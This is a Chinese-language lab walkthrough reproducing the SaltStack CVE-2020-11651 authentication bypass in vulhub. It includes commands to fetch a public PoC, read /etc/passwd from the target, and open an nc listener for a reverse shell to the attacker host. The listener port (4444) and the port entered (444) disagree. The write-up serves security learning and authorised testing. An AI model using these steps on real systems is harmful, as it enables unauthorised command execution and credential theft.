SaltStack認證繞過復現(CVE-2020-11651)

0x01簡介

Saltstack是一個服務器基礎架構集中化管理平臺，具有配置管理、遠程執行、監控等功能，能夠理解爲簡化版的puppet，它基於python語言實現，結合輕量級消息隊列（ZeroMQ）與python第三方模塊構建。具有如下特色：
部署簡單、方便
支持大部分UNIX/Linux及Windows環境
主從集中化管理
配置簡單、功能強大、擴展性強
主控端和被控制端基於證書認證，安全可靠
支持API及自定義模塊，可經過python輕鬆擴展

0x02漏洞簡介

在 CVE-2020-11651 認證繞過漏洞中，攻機者經過構造惡意請求，能夠繞過 Salt Master 的驗證邏輯，調用相關未受權函數功能，從而能夠形成遠程命令執行漏洞：
漏洞由ClearFuncs類引發，該類無心中暴露了_send_pub（）和_prep_auth_info（）方法。未經身份驗證的遠程攻機者經過發送特製的請求可在minion端服務器上執行任意命令，還可以提取根密鑰來調用master端服務器上的管理命令。

0x03影響版本

SaltStack < 2019.2.4
SaltStack < 3000.2

0x04環境搭建

在這裏就直接使用vulhub進行搭建
1.下載地址：git clone https://github.com/vulhub/vulhub.git
2.cd /vulhub/saltstack/CVE-2020-11651/
進去文件夾後，執行以下命令啓動一個SaltStack Master服務：
docker-compose up -d

使用docker ps查看環境是否啓動

0x05漏洞復現

小受：192.168.10.147
小攻：192.168.10.240

1.下載POC：
git clone https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP.git
執行poc須要安裝salt庫
pip3 install salt

2.使用poc讀取文件python3 CVE-2020-11651.py，給上目標ip後讀取文件/etc/passwd文件

3.在小攻執行nc監聽nc -lvnp 4444，而後選擇4反彈shell，輸入ip和監聽的端口
192.168.10.240
444

0x06修復建議

SaltStack官方已發佈最新版本修復了上述漏洞，建議相關用戶及時更新規避風險。

免責申明：
本項目僅進行信息蒐集，漏洞探測工做，無漏洞利用、***性行爲，發文初衷爲僅爲方便安全人員對受權項目完成測試工做和學習交流使用。
請使用者遵照當地相關法律，勿用於非受權測試，勿用於非受權測試，勿用於非受權測試（重要的事情說三遍），如做他用所承受的法律責任一律與做者無關！！！